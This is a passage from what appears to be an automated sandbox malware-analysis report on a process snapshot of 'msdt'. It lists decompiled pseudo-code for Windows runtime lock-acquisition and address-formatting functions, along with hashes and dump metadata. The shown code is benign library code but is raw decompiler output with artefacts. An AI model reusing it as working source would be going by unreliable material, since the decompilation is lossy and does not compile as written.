                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: __fassign
                                                                            • String ID: .$:$:
                                                                            • API String ID: 3965848254-2308638275
                                                                            • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                            • Instruction ID: faa1f971997929ba8d411f5a00e2fc157bc288a1b396f4b0fa719c98bdadf81f
                                                                            • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                            • Instruction Fuzzy Hash: 18A19D71D0021AEFDF2ACF68C8447BEB7B9AF45309F24846AD842A7382D731964DCB55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02630554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 50%
                                                                            			E02630554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026d01c0;
									_push(_t144);
									_push(0);
									_t51 = E025EF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02634FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02643F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02643F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0267217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02643F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02633915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026d01c0;
												_push(_t138);
												_push(0);
												_t58 = E025EF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02634FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02643F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02643F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0267217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02643F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02633915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02615384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E025EF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02633915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E025EF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02633915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E025EF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02633915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02615329(_t110, _t138);
																_t69 = E026153A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                            0x0263055a
                                                                            0x0263055d
                                                                            0x02630563
                                                                            0x02630566
                                                                            0x026305d8
                                                                            0x026305e2
                                                                            0x026305e5
                                                                            0x00000000
                                                                            0x026305e7
                                                                            0x026305e7
                                                                            0x026305ea
                                                                            0x026305f3
                                                                            0x026305f3
                                                                            0x02630568
                                                                            0x02630568
                                                                            0x02630568
                                                                            0x02630569
                                                                            0x02630569
                                                                            0x02630569
                                                                            0x0263056b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265217f
                                                                            0x02652183
                                                                            0x0265225b
                                                                            0x0265225f
                                                                            0x02652189
                                                                            0x0265218c
                                                                            0x0265218f
                                                                            0x02652194
                                                                            0x02652199
                                                                            0x0265219d
                                                                            0x026521a0
                                                                            0x026521a2
                                                                            0x026521ce
                                                                            0x026521ce
                                                                            0x026521ce
                                                                            0x026521d0
                                                                            0x026521d6
                                                                            0x026521de
                                                                            0x026521e2
                                                                            0x026521e8
                                                                            0x026521e9
                                                                            0x026521ec
                                                                            0x026521f1
                                                                            0x026521f6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026521f8
                                                                            0x026521fb
                                                                            0x02652206
                                                                            0x0265220b
                                                                            0x0265220c
                                                                            0x02652217
                                                                            0x02652226
                                                                            0x0265222b
                                                                            0x0265222c
                                                                            0x0265222f
                                                                            0x02652232
                                                                            0x02652235
                                                                            0x02652235
                                                                            0x0265223a
                                                                            0x0265223f
                                                                            0x02652241
                                                                            0x02652243
                                                                            0x02652248
                                                                            0x02652248
                                                                            0x0265224d
                                                                            0x0265224f
                                                                            0x02652262
                                                                            0x02652263
                                                                            0x02652268
                                                                            0x02652269
                                                                            0x02652269
                                                                            0x02652269
                                                                            0x0265226d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02652276
                                                                            0x02652279
                                                                            0x0265227e
                                                                            0x02652283
                                                                            0x02652287
                                                                            0x0265228a
                                                                            0x0265228d
                                                                            0x0265228f
                                                                            0x026522bc
                                                                            0x026522bc
                                                                            0x026522bc
                                                                            0x026522be
                                                                            0x026522c4
                                                                            0x026522cc
                                                                            0x026522d0
                                                                            0x026522d6
                                                                            0x026522d7
                                                                            0x026522da
                                                                            0x026522df
                                                                            0x026522e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522e6
                                                                            0x026522e9
                                                                            0x026522f4
                                                                            0x026522f9
                                                                            0x026522fa
                                                                            0x02652305
                                                                            0x02652314
                                                                            0x02652319
                                                                            0x0265231a
                                                                            0x0265231d
                                                                            0x02652320
                                                                            0x02652323
                                                                            0x02652323
                                                                            0x02652328
                                                                            0x0265232d
                                                                            0x0265232f
                                                                            0x02652331
                                                                            0x02652336
                                                                            0x02652336
                                                                            0x0265233b
                                                                            0x0265233d
                                                                            0x02652350
                                                                            0x02652351
                                                                            0x02652356
                                                                            0x02652359
                                                                            0x02652359
                                                                            0x0265235b
                                                                            0x0265235d
                                                                            0x02615367
                                                                            0x0261536b
                                                                            0x02615372
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02652363
                                                                            0x02652363
                                                                            0x02652369
                                                                            0x0265236a
                                                                            0x0265236c
                                                                            0x02652371
                                                                            0x02652373
                                                                            0x00000000
                                                                            0x02652379
                                                                            0x02652379
                                                                            0x0265237a
                                                                            0x0265237f
                                                                            0x0265237f
                                                                            0x02652385
                                                                            0x02652386
                                                                            0x02652389
                                                                            0x0265238e
                                                                            0x02652390
                                                                            0x02615378
                                                                            0x0261537c
                                                                            0x02652396
                                                                            0x02652396
                                                                            0x02652397
                                                                            0x0265239c
                                                                            0x026523a2
                                                                            0x026523a3
                                                                            0x026523a6
                                                                            0x026523ab
                                                                            0x026523ad
                                                                            0x00000000
                                                                            0x026523b3
                                                                            0x026523b3
                                                                            0x026523b4
                                                                            0x026523b9
                                                                            0x026523ba
                                                                            0x026523ba
                                                                            0x026523bc
                                                                            0x026523bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02649153
                                                                            0x02649158
                                                                            0x0264915a
                                                                            0x0264915e
                                                                            0x02649160
                                                                            0x00000000
                                                                            0x02649166
                                                                            0x02649166
                                                                            0x02649171
                                                                            0x02649176
                                                                            0x02649176
                                                                            0x00000000
                                                                            0x02649160
                                                                            0x026523c6
                                                                            0x026523ce
                                                                            0x026523d7
                                                                            0x026523d7
                                                                            0x026523ad
                                                                            0x02652390
                                                                            0x02652373
                                                                            0x0265233f
                                                                            0x0265233f
                                                                            0x00000000
                                                                            0x0265233f
                                                                            0x02652291
                                                                            0x02652291
                                                                            0x02652293
                                                                            0x02652295
                                                                            0x0265229a
                                                                            0x026522a1
                                                                            0x026522a3
                                                                            0x026522a7
                                                                            0x026522a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522ab
                                                                            0x026522ad
                                                                            0x026522af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522af
                                                                            0x026522b1
                                                                            0x026522b4
                                                                            0x026522b4
                                                                            0x026522b6
                                                                            0x026153be
                                                                            0x026153be
                                                                            0x026153be
                                                                            0x026153c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026153cb
                                                                            0x026153ce
                                                                            0x026153d0
                                                                            0x026153d4
                                                                            0x026153d6
                                                                            0x00000000
                                                                            0x026153d8
                                                                            0x026153e3
                                                                            0x026153ea
                                                                            0x026153ea
                                                                            0x00000000
                                                                            0x026153d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522b6
                                                                            0x00000000
                                                                            0x0265228f
                                                                            0x02652349
                                                                            0x0265234d
                                                                            0x02652251
                                                                            0x02652251
                                                                            0x00000000
                                                                            0x02652251
                                                                            0x026521a4
                                                                            0x026521a4
                                                                            0x026521a6
                                                                            0x026521a8
                                                                            0x026521ac
                                                                            0x026521b6
                                                                            0x026521b8
                                                                            0x026521bc
                                                                            0x026521be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026521c0
                                                                            0x026521c2
                                                                            0x026521c4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026521c4
                                                                            0x026521c6
                                                                            0x026521c6
                                                                            0x026521c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026521c8
                                                                            0x026521a2
                                                                            0x00000000
                                                                            0x02652183
                                                                            0x0263057b
                                                                            0x0263057d
                                                                            0x02630581
                                                                            0x02630583
                                                                            0x02652178
                                                                            0x00000000
                                                                            0x02630589
                                                                            0x0263058f
                                                                            0x0263058f
                                                                            0x02630583
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02652206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-4236105082
                                                                            • Opcode ID: cfb0e3d4aff16a02cd4937944ee208cb2d97654f2ba1932b3797c4009fecdf7f
                                                                            • Instruction ID: b72fdd25ae4a52220fc508d5733d2564b4315666325bc3d1687c014b50aeb339
                                                                            • Opcode Fuzzy Hash: cfb0e3d4aff16a02cd4937944ee208cb2d97654f2ba1932b3797c4009fecdf7f
                                                                            • Instruction Fuzzy Hash: 915128757002116BEB25CE18CCD1F6773AAAF84724F25826DEE55DB384DB31EC428B98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 026314C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 64%
                                                                            			E026314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x26d2088; // 0x7632310a
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02627707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E026313CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02627707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02627707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E025F2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E025FE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                            0x026314c0
                                                                            0x026314cb
                                                                            0x026314d2
                                                                            0x026314d6
                                                                            0x026314da
                                                                            0x026314de
                                                                            0x026314e3
                                                                            0x0263157a
                                                                            0x0263157a
                                                                            0x026314f1
                                                                            0x026314f3
                                                                            0x0265ea0f
                                                                            0x00000000
                                                                            0x0265ea15
                                                                            0x00000000
                                                                            0x0265ea15
                                                                            0x026314f9
                                                                            0x026314f9
                                                                            0x026314fe
                                                                            0x02631504
                                                                            0x0265ea1a
                                                                            0x0265ea1f
                                                                            0x0265ea21
                                                                            0x0265ea22
                                                                            0x0265ea27
                                                                            0x0265ea2a
                                                                            0x0265ea2a
                                                                            0x02631515
                                                                            0x02631517
                                                                            0x0263156d
                                                                            0x02631572
                                                                            0x02631575
                                                                            0x02631575
                                                                            0x0263151e
                                                                            0x0265ea50
                                                                            0x0265ea55
                                                                            0x0265ea58
                                                                            0x0265ea58
                                                                            0x0263152e
                                                                            0x02631531
                                                                            0x02631533
                                                                            0x00000000
                                                                            0x02631535
                                                                            0x02631541
                                                                            0x02631549
                                                                            0x02631549
                                                                            0x02631533
                                                                            0x026314f3
                                                                            0x02631559

                                                                            APIs
                                                                            • ___swprintf_l.LIBCMT ref: 0265EA22
                                                                              • Part of subcall function 026313CB: ___swprintf_l.LIBCMT ref: 0263146B
                                                                              • Part of subcall function 026313CB: ___swprintf_l.LIBCMT ref: 02631490
                                                                            • ___swprintf_l.LIBCMT ref: 0263156D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 2b2b3a750d2328421a5a283513a09241842293cb8ae8a042fc7a018245b75b98
                                                                            • Instruction ID: 2503306a5fcc3ad7bb2e4ec23f391f237410b49659ef175094a576a9c1016dfa
                                                                            • Opcode Fuzzy Hash: 2b2b3a750d2328421a5a283513a09241842293cb8ae8a042fc7a018245b75b98
                                                                            • Instruction Fuzzy Hash: 9221D5B39006299BDF22DF64CC40AEEB3ACBB51714F444496ED4AD3240DB71EA598FE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 026153A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 45%
                                                                            			E026153A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026d01c0;
									_push(_t92);
									_push(0);
									_t37 = E025EF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02634FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02643F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02643F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0267217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02643F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02633915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02615384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E025EF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02633915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E025EF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02633915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E025EF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02633915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02615329(_t74, _t92);
													_push(1);
													_t48 = E026153A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                            0x026153ab
                                                                            0x026153ae
                                                                            0x026153b1
                                                                            0x026153b4
                                                                            0x026153b7
                                                                            0x026305b6
                                                                            0x026305c0
                                                                            0x026305c3
                                                                            0x00000000
                                                                            0x026305c9
                                                                            0x026305c9
                                                                            0x026305cc
                                                                            0x026305d5
                                                                            0x026305d5
                                                                            0x026153bd
                                                                            0x026153bd
                                                                            0x026153bd
                                                                            0x026153be
                                                                            0x026153be
                                                                            0x026153be
                                                                            0x026153c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02652269
                                                                            0x0265226d
                                                                            0x02652349
                                                                            0x0265234d
                                                                            0x02652273
                                                                            0x02652276
                                                                            0x02652279
                                                                            0x0265227e
                                                                            0x02652283
                                                                            0x02652287
                                                                            0x0265228a
                                                                            0x0265228d
                                                                            0x0265228f
                                                                            0x026522bc
                                                                            0x026522bc
                                                                            0x026522bc
                                                                            0x026522be
                                                                            0x026522c4
                                                                            0x026522cc
                                                                            0x026522d0
                                                                            0x026522d6
                                                                            0x026522d7
                                                                            0x026522da
                                                                            0x026522df
                                                                            0x026522e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522e6
                                                                            0x026522e9
                                                                            0x026522f4
                                                                            0x026522f9
                                                                            0x026522fa
                                                                            0x02652305
                                                                            0x02652314
                                                                            0x02652319
                                                                            0x0265231a
